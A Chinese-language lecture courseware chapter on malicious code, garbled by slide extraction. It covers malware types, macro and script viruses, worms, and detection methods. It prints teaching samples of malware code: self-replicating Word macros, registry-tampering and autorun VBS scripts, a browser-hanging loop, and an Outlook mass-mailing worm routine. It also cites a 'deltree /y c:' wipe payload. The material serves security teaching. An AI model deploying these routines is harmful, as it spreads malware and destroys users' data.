恶意代码课件

第六章恶意代码第六章恶意代码基本内容1.概述2.恶意代码技术3.计算机病毒的原理与防治措施基本内容1.概述1986年，报道了攻击MicrosoftMS-DOS个人计算机的第一批病毒。先后出现了感染启动扇区的引导区病毒、感染可执行文件的文件型病毒。1988年出现了第一个Internet蠕虫MorrisWorm，导致Internet的通信速度大大地降低。1990年，网上出现了病毒交流布告栏，还出版了第一本关于病毒编写的书籍。病毒变得越来越复杂：病毒开始访问电子邮件通讯簿，并将其自身发送到联系人；宏病毒将其自身附加到各种办公类型的文件；此外还出现了专门利用操作系统和应用程序漏洞的病毒。1986年，报道了攻击MicrosoftMS-DOS个2.1什么是恶意软件故意在计算机系统上执行恶意任务的病毒、蠕虫和特洛伊木马。特洛伊木马：该程序看上去有用或无害，但包含了旨在利用或损坏运行该程序的系统的隐藏代码；蠕虫：蠕虫是能够自行传播的恶意代码，它可以通过网络连接自动将其自身从一台计算机分发到另一台计算机上。病毒：病毒将其自身附加到宿主程序，在计算机之间进行传播。宿主程序执行时，病毒代码也随之运行，并会感染新的宿主，条件满足时执行恶意破坏任务。2.1什么是恶意软件故意在计算机系统上执行恶意任务的病毒、2.2恶意软件的特征攻击目标：恶意软件一般具有相对固定的攻击目标，可以是特定设备、特定系统或者特定软件。设备某些恶意软件将一种设备类型作为专门的攻击目标操作系统恶意软件可能需要特殊的操作系统才会有效应用程序恶意软件可能需要在目标计算机上安装特定的应用程序，才能传递负载或进行复制2.2恶意软件的特征攻击目标：恶意软件一般具有相对固定的2.2恶意软件的特征携带者对象：如果恶意软件是病毒，它需要感染携带者才能进行传播。携带者的数量和类型随恶意软件的不同而不同。可执行文件：这是通过将其自身附加到宿主程序进行复制的“典型”病毒类型的目标对象脚本：将脚本用作携带者目标文件的攻击宏：这些携带者是支持特定应用程序（例如，字处理器、电子表格或数据库应用程序）的宏脚本语言的文件启动扇区：计算机磁盘（硬盘和可启动的可移动媒体）上的特定区域。此外，有的病毒能同时将文件和启动扇区作为感染目标和携带者。2.2恶意软件的特征携带者对象：如果恶意软件是病毒，它需要2.2恶意软件的特征传输机制：攻击可以使用一个或多个不同方法在计算机系统之间传播和复制。可移动媒体：计算机病毒和其他恶意软件最初的、并且可能也是最多产的传送器（至少到当前为止）是文件传输。网络共享：一旦为计算机提供了通过网络彼此直接连接的机制，就会为恶意软件编写者提供另一个传输机制，而此机制所具有的潜力可能会超出可移动媒体的能力，从而可以传播恶意代码。电子邮件：电子邮件已成为许多恶意软件攻击的传输机制。远程利用：恶意软件可能会试图利用服务或应用程序中的特定安全漏洞来进行复制2.2恶意软件的特征传输机制：攻击可以使用一个或多个不同方2.2恶意软件的特征破坏机制:一旦恶意软件通过传输到达了宿主计算机，它通常会执行一个称为“负载”的操作，负载可以采用许多形式.后门：这种类型的负载允许对计算机进行未经授权的访问数据损坏或删除：一种最具破坏性的负载类型应该是损坏或删除数据的恶意代码，它可以使用户计算机上的信息变得无用信息窃取：一种特别令人担心的恶意软件负载类型是旨在窃取信息的负载，它通过提供一种将信息传回恶意软件作恶者的机制窃取信息拒绝服务(DoS)：可以传递的一种最简单的负载类型是拒绝服务攻击分布式拒绝服务(DDoS)：DDoS攻击是一种拒绝服务攻击，其中攻击者使用各种计算机上安装的恶意代码来攻击单个目标2.2恶意软件的特征破坏机制:一旦恶意软件通过传输到达了2.2恶意软件的特征触发机制:触发机制是恶意软件的一个特征，恶意软件使用此机制启动复制或负载传递手动执行:这种类型的触发机制是指由受害者直接执行恶意软件半自动执行:这种类型的触发机制最初由受害者启动，之后则自动执行自动执行:这种类型的触发机制根本无须手动执行定时炸弹:这种类型的触发机制在一段时间之后执行操作触发条件:这种类型的触发机制使用某个预先确定的条件作为触发器来传递其负载2.2恶意软件的特征触发机制:触发机制是恶意软件的一个特征2.2恶意软件的特征防护机制：许多恶意软件使用某种类型的防护机制，来降低被发现和删除的可能性。装甲：这种类型的防护机制使用某种试图防止对恶意代码进行分析的技术窃取：恶意软件使用此类技术，通过截获信息请求并返回错误数据来隐藏其自身加密：使用此防护机制的恶意软件加密其自身或负载（有时甚至加密其他系统数据）寡态:此特征的恶意软件使用加密防护机制进行自身防护，并且可以将加密例程更改为只能使用固定的次数（通常数目很小）。多态:这种类型的恶意软件使用加密防护机制更改其自身，以免被检测出来。2.2恶意软件的特征防护机制：许多恶意软件使用某种类型的防2.3什么不是恶意软件玩笑软件玩笑应用程序旨在生成一个微笑，或在最糟糕的情况下浪费某人的时间。这些应用程序自从人们开始使用计算机以来就一直存在。它们不是出于邪恶的目的而被开发的，而且很明白地标识为玩笑，因此并不被认为是恶意软件恶作剧通常情况下，欺骗某人为您做事要比编写软件使人在不知情的情况下做事容易。因此，在IT行业可以看到大量的恶作剧。2.3什么不是恶意软件玩笑软件2.3什么不是恶意软件欺诈实际上，违法者已经使用过各种通信形式，试图欺骗人们执行会给其带来某些经济利益的操作。Internet、网站和电子邮件都不例外。一个比较常见的示例是，违法者发送电子邮件，试图欺骗收件人透露个人信息（例如，银行帐户信息），然后将这些信息用于非法用途。垃圾邮件（Spam）垃圾邮件是未经请求,不请自来的电子邮件，用于为某些服务或产品做广告。它通常被认做是讨厌的东西，垃圾邮件不是恶意软件,但垃圾邮件数量的飞速增长已经成为Internet基础结构的一个问题，这可导致员工工作效率的降低，因为他们每天必须费力查看并删除此类邮件。2.3什么不是恶意软件欺诈2.3什么不是恶意软件间谍软件此类软件有时也称为“spybot”或“跟踪软件”。间谍软件使用其他形式的欺骗性软件和程序，它们在没有获取用户相应许可的情况下即在计算机上执行某些活动。这些活动可以包括收集个人信息，以及更改Internet浏览器配置设置。除了令人讨厌之外，间谍软件还会导致各种问题，从降低计算机的总体性能到侵犯个人隐私。广告软件广告软件通常与宿主应用程序组合在一起，只要用户同意接受广告软件即可免费提供宿主应用程序。因为广告软件应用程序通常在用户接受说明应用程序用途的许可协议之后进行安装，因而不会给用户带来任何不快。但弹出式广告会非常令人讨厌，并且在某些情况下会降低系统性能。2.3什么不是恶意软件间谍软件2.3什么不是恶意软件InternetCookieInternetCookie是由用户所访问的网站放置在用户计算机上的文本文件。Cookie包含与用户相关的标识信息，并将该信息提供给网站，然后网站将这些信息（连同站点要保留的、与用户访问相关的任何其他信息）放置在用户计算机上。Cookie是合法工具，许多网站使用它们跟踪访问者的信息2.3什么不是恶意软件InternetCookie计算机病毒计算机病毒是一个指令序列，它能够把自身的拷贝插入到其他宿主程序中；计算机病毒是隐藏在计算机系统的数据资源中，利用系统数据资源进行繁殖并生存，并能影响计算机系统正常运行的并通过系统数据共享进行传染的程序。我国：“计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。”计算机病毒计算机病毒是一个指令序列，它能够把自身的拷贝插入到病毒的结构所有计算机病毒都是由三部分组成的，即病毒引导模块、病毒传染模块和病毒表现模块病毒的结构所有计算机病毒都是由三部分组成的，即病毒引导模块、病毒的分类按攻击对象分类攻击x86系列机的病毒这种病毒的种类最多，这是由于PC机及DOS/Windows操作系统的广泛使用以及软件硬件资料的开放性所决定的。攻击Macintosh系列机的病毒Apple公司生产的Macintosh系列计算机的应用也比较广泛，所以也出现了一些攻击Macintosh的病毒，如Score病毒、NVIR病毒等等。攻击Unix操作系统的病毒目前大、中、小型机以及工作站大都采用Unix系统，特别是网络环境中，攻击Unix系统的病毒对计算机信息系统也构成了严重威胁。病毒的分类按攻击对象分类按链接方式分类操作系统病毒:操作系统病毒在传染时，用自己的运行逻辑取代操作系统的正常逻辑模块。外壳型病毒:外壳型病毒是将病毒本身包围在宿主程序周围对原来的程序不作修改。入侵型病毒:入侵型病毒是将病毒本身插入到攻击目标之中而不是链接在它的首部或尾部。一旦病毒程序入侵到一个程序之中，就很难被发现，隐蔽性很好，即使发现后也难以清除，但它能够传染的对象受到了一定的限制。源码病毒:主要是利用Java、VBS、ActiveX等网络编程语言编写，放在电子邮件的附件或者HTML主页中，进入被感染计算机中执行。按链接方式分类按传染对象分类引导型病毒：引导型病毒的全部或部分寄生在磁盘引导区中，并且只传染磁盘引导区。文件型病毒：这类病毒以可执行文件作为传染对象，在运行被传染的可执行文件时，病毒程序的引导代码在正常程序之前获得控制权。宏病毒：它的传染对象是Windows系统中Word、Excel、Access、PowerPoint等文档。按传染对象分类引导型病毒：引导型病毒的全部或部分寄生在磁盘宏病毒实例Word宏：office宏是微软公司为其OFFICE软件包设计的一个特殊功能，软件设计者为了让人们在使用软件进行工作时，避免一再地重复相同的动作而设计出来的一种工具。在word6.0和offfice95中，编写宏主要使用WordBasic语言，使用这些宏命令可以编写病毒的安装、传播、和破坏的宏。从office97之后，WordBasic逐渐被宏语言VBA所取代，VBA适用于所有应用程序，包括Word、Excel、PowerPoint、Access、Outlook以及Project。这样，用户无论是在Excel中，还是在Word中以至是在Access中建立和管理VBA都具有统一的方法和标准。VBA包含一个由对象构成的层次结构，每个对象都包含一组方法和属性，大部分的WordBasic命令可以在VBA下以WordBasic对象的方法的方式运行，也有一些命令没有直接对应的方法。宏病毒实例Word宏：office宏是微软公司为其OFFI3.1宏病毒在Word启动时，自动加载Startup模板及Normal.dot模板以及它们所包含的宏。如果将自己定义的宏取为特定的名称，就可以变为自动宏，从而在特定时机自动执行宏名运行条件AutoExec启动Word时AutoNew每次新建文档时AutoOpen每次打开已有文档时AutoClose每次关闭文档时AutoExit退出Word时FileOpen文件被打开时FileSave文件被保存时FileSaveAs文件被另存时3.1宏病毒在Word启动时，自动加载Startup模板及宏病毒的分类宏病毒是能够循环复制自身的，具有破坏作用的一个或多个宏的集合。目前常见的宏病毒根据破坏性主要有以下几种：只进行自身的传播，并不具有破坏性的类型。只对用户进行骚扰，但不破坏系统的类型。使打印中途中断或打印出混乱信息的类型。极具破坏性的类型。如MDMA．A(无政府者一号)，这种病毒既传染中文版Word，又传染英文版Word，发作时间是每月的1日。破坏性表现为在机器的批处理文件Autoexec．bat中加入“deltree／yc：”一句，机器在下一次启动后就将自动删除C盘上的所有文件。另外有一种双栖复合型病毒，如Nuclear病毒，是由AutoExec、Dropsuriv、Fileexit等9种宏病毒复合成的一种DOS和Windows双栖型驻留宏病毒。Nuclear发作时将一个名为ph33r的病毒传染到计算机上并激活，清除机器中的MSDOS.SYS、IO.SYS和COMMAND.COM文件，使计算机瘫痪，这种病毒在每年的4月5日发作。宏病毒的分类宏病毒是能够循环复制自身的，具有破坏作用的一个或宏病毒的特征由于宏病毒利用了Word的文档机制进行传播，寄生于Word的文档中，它不感染EXE和COM文件，只感染文档文件。特点：传播极快。制作、变种方便。破坏可能性极大。WordBasic以及VBA语言提供了许多系统级底层调用，如直接使用DOS系统命令调用WindowsAPI、DLL等。这些操作均可能对系统直接构成威胁。宏病毒的特征由于宏病毒利用了Word的文档机制进行传播，寄生宏病毒实例宏病毒实例OnErrorGotoAbortiMacroCount=CountMacros(0,0)Fori=1ToiMacroCountIfMacroName$(i,0,0)=”PayLoad”ThenbInstalled=-1EndIfNextI病毒安装:通过文档传染系统的过程可以定义autoopen或者FileOpen宏实现

OnErrorGotoAbort病毒安装:通过文档传染IfNotbInstalledThenFN$=FileName$()Macros=FN$+"PayLoad"MacroCopyMacro$,"PayLoad"Macro$=FN$+"FileOpen"MacroCopyMacro$,"FileOpen"Macro$=FN$+"FileSaveAs"MacroCopyMacroS,"FileSaveAs"Macro$=FN$+"AutoExec"MacroCopyMacro$,"AutoExec"EndIfAbort:EndSubIfNotbInstalledThenDimdlgAsFileSaveAsGetCurValuesdlgDialogdlgsMc$=FileName$()If(dlg.Format=0)Or(dlg.Format=l)ThenMacroCopy"FileSaveAs",sMc$+":FileSaveAsMacroCopy"FileSave",sMc$+":FileSave"MacroCopy"PayLoad",sMc$+":PayLoad"MacroCopy"FileOpen",sMc$+":FileOpen"dlg.Format=1//表示作为模板保存EndIfFileSaveAsdlg//做实际的保存EndSub病毒复制:使用FileSave和PileSaveAs宏将模板中的宏拷贝到文档中

DimdlgAsFileSaveAs病毒复制:使用Fi病毒破坏可以使用宏命令编写任意的破坏代码，比如格式化硬盘等，也可以用宏调用外部病毒或者一些木马程序。例如：在FileClose宏中写下如下指令：MsgBox(“Youareinfected,HaHa”)病毒破坏可以使用宏命令编写任意的破坏代码，比如格式化硬盘等，宏病毒的预防和清除检查是否存在“可疑”的宏。所谓可疑的宏，是指用户自己没有编制过，也不是Word默认提供的，而是新出现的宏，尤其对以“Auto”开头的宏，应当高度警惕。对于已被传染病毒的文件首先将Normal.dot中的自动宏清除(AutoOpen、AutoClose、AutoNew等)，然后将Normal.dot置成只读方式。为防止Word系统被感染，DOS的Autoexec．bat和Config.sys文件最好也都设为只读属性；由于宏病毒是通过自动执行宏的方式来激活、传染和破坏的，所以将自动执行宏屏蔽掉，Word就不会自动执行宏。文档中或Word系统即使有宏病毒存在，但由于无法被激活，也就无法传染和破坏，起到了防毒的效果。具体方法是：在Normal.dot中编写名为“AutoExec”的自动执行宏，内容为DisableAutoMacros。在打开文件时，按住Shift键可以阻止自动宏的运行。宏病毒的预防和清除检查是否存在“可疑”的宏。所谓可疑的宏，3.2脚本病毒脚本病毒是目前最流行的计算机病毒，通常利用网络介质进行传播和破坏系统资源，具有破坏性强、传播速度快、变种类型多、代码编写容易等特点。3.2脚本病毒脚本病毒是目前最流行的计算机病毒，通常利用脚本程序的执行离不开WSH(WindowsScriptHost，Windows脚本宿主)环境，WSH为宿主脚本创建环境。WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制，它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH，用户能够操纵WSH对象、ActiveX对象、注册表和文件系统，还可访问活动目录服务。脚本程序的执行离不开WSH(WindowsScriptH网页恶意代码病毒消耗系统资源。通过不断消耗本机系统资源，使计算机不能处理其他进程，导致系统与网络瘫痪。这类病毒大都是利用JavaScript产生一个死循环，它可以在有恶意的网站中出现，也可以被当做邮件的附件发给用户，当用户打开htm、vbs附件时，屏幕出现无数个浏览器窗口，最后不得不关机重新启动；非法向用户的硬盘写入文件。最近有部分个人主页或邮件含有可以格式化本地硬盘的恶意代码；IE泄密。利用IE5.0的漏洞，网页可以读取客户机的文件，攻击者获取用户帐号与密码。利用邮件非法安装木马。网页恶意代码病毒消耗系统资源。通过不断消耗本机系统资源，使计一个示意性的恶意网页代码，该程序利用死循环的原理，交叉显示红色和黑色，造成刺眼的效果，该代码可以使IE5.0崩溃。<html><body>Test<script>varcolor=newArray;color[1]="black";color[2]="red";for(x=2;x<3;x++){document.bgColor=color[x];//设置背景色if(x==2){x=0;}//造成死循环}</script><body></html>一个示意性的恶意网页代码，该程序利用死循环的原理，交叉显示红攻击注册表的恶意脚本注册表的相关操作:创建一个能与操作系统沟通的对象

DimOperationRegistrySetOperationRegistry=WScript.CreateObject("WScript.Shell")RegRead：读操作RegRead主要是用来读取注册表中主键的默认值或键值，例如：Read_Data1=OperationRegistry.RegRead("HKCR\xxx\")RegWrite：写操作RegWrite主要是用来在注册表中新建主键或键值，并赋予给它们一个初始值。OperationRegistry.RegWrite"HKCR\xxx\value",1,"REG_DWORD"RegDelete：删除操作RegDelete主要是用来删除注册表中已存在的主键或键值，同读操作类似需要指定键路径。攻击注册表的恶意脚本注册表的相关操作:操作注册表的脚本程序实例'脚本文件名ChangeStartMenu.vbs

SubChange(Argument)ChangeStartMenu.RegWriteRegPath&Argument,Key_Data,Type_NameMsgBox("Success!")EndSubDimChangeStartMenuSetChangeStartMenu=WScript.CreateObject("WScript.Shell")RegPath="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”Type_Name="REG_DWORD"Key_Data=1操作注册表的脚本程序实例'脚本文件名ChangeStartMStartMenu_Run="NoRun"StartMenu_Find="NoFind"StartMenu_Close="NoClose"CallChange(StartMenu_Run)'禁用“开始”菜单中的“运行”功能CallChange(StartMenu_Find)'禁用“开始”菜单中的“查找”功能CallChange(StartMenu_Close)'禁用“开始”菜单中的“关闭系统”功能StartMenu_Run="NoRun"向Windows中添加自启动程序，使得该程序能在开机时自动运行。向Windows中添加自启动程序，使得该程序能在开机时自动运'脚本文件名为AddAutoRunProgram.vbs'假设要添加的自启动程序为c:\myfile\myautorun.exeDimAutoRunProgramSetAutoRunProgram=WScript.CreateObject("WScript.Shell")RegPath="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"Type_Name="REG_SZ"Key_Name="AutoRun"Key_Data="C:\myfile\myautorun.exe"'该自启动程序的全路径文件名AutoRunProgramReg.WriteRegPath&Key_Name,Key_Data,Type_Name'在启动组中添加自启动程序myautorun.exeMsgBox("Success!")'脚本文件名为AddAutoRunProgram.vbsIE相关的注册表项

设置IE的默认连接首页键值：HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\StartPageHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main例如：将键值设置为“”，在打开IE窗口时将显示“百度”的首页。IE相关的注册表项

设置IE的默认连接首页不允许修改IE的起始页通过修改注册表键值，不允许用户修改起始页。涉及的注册表键值是：HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel下的homepage键值。原来的键值为“0”，被修改后为“1”，这时“IE选项”中的“使用默认值”按钮为灰色，不可用。不允许修改IE的起始页注册表解锁：注册表被锁是病毒攻击常用的手段，在输入命令regedit时，注册表不能够使用，并发现系统提示你没有权限运行该程序。HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值DisableRegistryTools被修改为1的缘故，将其值恢复为0即可恢复注册表编辑器的使用。用文本编辑器编写一个文件，命名为后缀为“.reg”的文件。对Windows2000文件的内容如下：WindowsRegistryEditorVersion5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]”DisableRegistryTools”=DWORD:00000000注册表解锁：注册表被锁是病毒攻击常用的手段，在输入命令reg脚本病毒的预防与清除方法一：通过将Windows安装的组件“WindowsScriptingHost”卸载，来阻止VBS脚本程序执行。方法二：通过改变VBS文件打开方式来阻止VBS脚本程序的执行。默认情况下VBS脚本文件使用wscrip.exe来打开并解释执行的，因此只要将VBS脚本文件改为用“记事本”notepad.exe来打开，那就不会感染这类病毒了。方法三：脚本用户可在运行脚本之前验证其真实性。脚本开发人员对其脚本进行签名，以免发生未经授权的修改。管理员可以强制实施严格的策略，确定哪些用户有权修改本地或远程运行脚本。脚本病毒的预防与清除方法一：通过将Windows安装的组件计算机病毒的防治技术“防毒”即防止病毒侵入，根据系统的应用环境采取相应的系统安全措施预防病毒侵入计算机；“查毒”即发现病毒的能力。检查在特定环境中是否存在病毒，并能够准确地报出病毒名称，检查的对象可能是内存、文件(可执行文件、Word文件、VBS文件及其他)、磁盘引导区等。查毒率和误报率是查毒能力的两个重要指标。“杀毒”即清除病毒的能力。根据不同类型病毒的感染方式，需要采取不同的方法进行恢复。将病毒从感染对象中清除以后，要求恢复到被感染之前的状态。计算机病毒的防治技术“防毒”即防止病毒侵入，根据系统的应用检测病毒的方法特征代码法：特征代码法是使用最多的方法之一，被早期应用于SCAN、CPAV、KV系列等著名病毒检测工具中。一般认为特征代码法是检测已知病毒的最简单、开销最小的方法。（1）采集已知病毒样本；（2）在病毒样本中，提取特征代码。（3）将特征代码纳入病毒特征数据库。（4）打开被检测文件，在文件中搜索，检查文件中是否含有病毒数据库中的病毒特征代码。（5）出现新病毒后，重复第1~3步，将该病毒的特征代码纳入病毒数据库，更新版本。检测病毒的方法特征代码法：特征代码法是使用最多的方法之一校验和法:在文件被感染前，根据文件的内容计算其校验和，将该校验和保存在其他文件中。在每次使用文件时，读出文件的内容并重新计算校验和，比较与原来保存值是否一致，若不一致就可以认为文件被感染。也可以定期地对文件进行校验。优点：校验和法既可发现已知病毒又可发现未知病毒。缺点：只能判断出文件是否被修改，而不能识别病毒种类，也不能报出病毒名称。另一方面，由于病毒感染并非文件内容改变的惟一原因，文件内容的改变也可能是其他情况引起的。在这种情况下就会产生误报警。校验和法对隐蔽性病毒无效。隐蔽性病毒进驻内存后，会自动剥去染毒程序中的病毒代码，使校验和法受骗，对一个有毒文件算出正常校验和。校验和法:在文件被感染前，根据文件的内容计算其校验和，将该校行为监测法：利用病毒的特有行为的特殊性来监测病毒的方法，称为行为监测法。通过对病毒的深入分析和总结，发现一些病毒的共同行为，而且这些行为具有特殊性，不会在正常程序中出现，或者比较罕见。在程序运行过程中，监视其行为，与事先总结出的行为特征进行匹配，如果发现了病毒行为，立即报警。行为监测法：利用病毒的特有行为的特殊性来监测病毒的方法，称3.3蠕虫计算机蠕虫是一种可以通过网络连接进行自身复制的程序，与以往病毒方式不同，文件型病毒、宏病毒需要在计算机的硬盘、软盘或文件系统中繁殖，而典型的蠕虫只会在内存中维持一个活动副本，甚至根本不向硬盘写入任何信息。自从1988年莫里斯从实验室研制出第一个蠕虫以来，蠕虫以其快速、多样化的传播方式不断给网络世界带来灾害。特别是1999年以来，高危蠕虫不断出现，使世界蒙受了轻则几十亿，重则几百亿美元的巨大经济损失。3.3蠕虫计算机蠕虫是一种可以通过网络连接进行自身复制的近年来蠕虫爆发情况统计表蠕虫名称爆发时间造成损失莫里斯蠕虫1988年6000多台电脑停机，经济损失达9600万美元梅丽莎1999年政府部门和一些大公司紧急关闭了网络服务器，经济损失超过12亿Iloveyou2000年5月众多用户电脑被感染，损失达96亿美元红色代码2001年7月网络瘫痪，直接经济损失超过26亿求职信2001年12月大量邮件堵塞服务器，损失达数百亿美元蠕虫王2003年1月网络大面积瘫痪，银行自动取款机运行中断，直接损失超过26亿冲击波2003年7月大量网络瘫痪，造成数十亿美元的损失MyDoom2004年1月大量的垃圾邮件阻塞SCO和微软网站，给全球经济造成了300多亿美元的损失近年来蠕虫爆发情况统计表蠕虫名称爆发时间造成损失莫里自我复制过程创建一个文件操作对象SetobjFs=CreateObject("Scripting.FileSystemObject")通过文件操作对象的方法创建了一个TXT文件objFs.CreateTextFile("C:\virus.txt")如果把这两句话保存成为vbs的脚本文件，点击它，就会在C盘中创建一个TXT文件了。ObjFs.GetFile(WScript.ScriptFullName).Copy(“C:\Virus.vbs”)自我复制过程创建一个文件操作对象通过邮件传播FunctionmailBroadcast()OnerrorresumenextWscript.echoSetoutlookApp=CreateObject(“Outlook.Application”)；创建一个Outlook应用的对象IfoutlookApp=”Outlook”ThenSetmapiObj=outlookApp.GetNameSpace(“MAPI”)；获取MAPI的名字空间SetaddrList=mapiObj.AddressLists；获取地址表的个数ForEachaddrlnaddrList1faddr.AddressEntries.Count<>0ThenaddrEntCount=addr.AddressEntries.Count；获取每个地址表的Email记录数ForaddrEntlndex=1TOaddrEntCount；遍历地址表的Email地址

通过邮件传播FunctionmailBroadcast(Setitem=outlookApp.CreateItem(0)；获取一个邮件对象实例SetaddrEnt=addr.AddressEntries(addrEntlndex)；获取具体Email地址Item.TO=addrEnt.Address；填入收信人地址Item.Suject=”病毒传播实验”；写入邮件标题Item.Body=”这是病毒实验软件测试，收到此信请不要慌张!”；写入文件内容SetattachMents=item.Attachments；定义邮件附件Attachments.AddfileSysO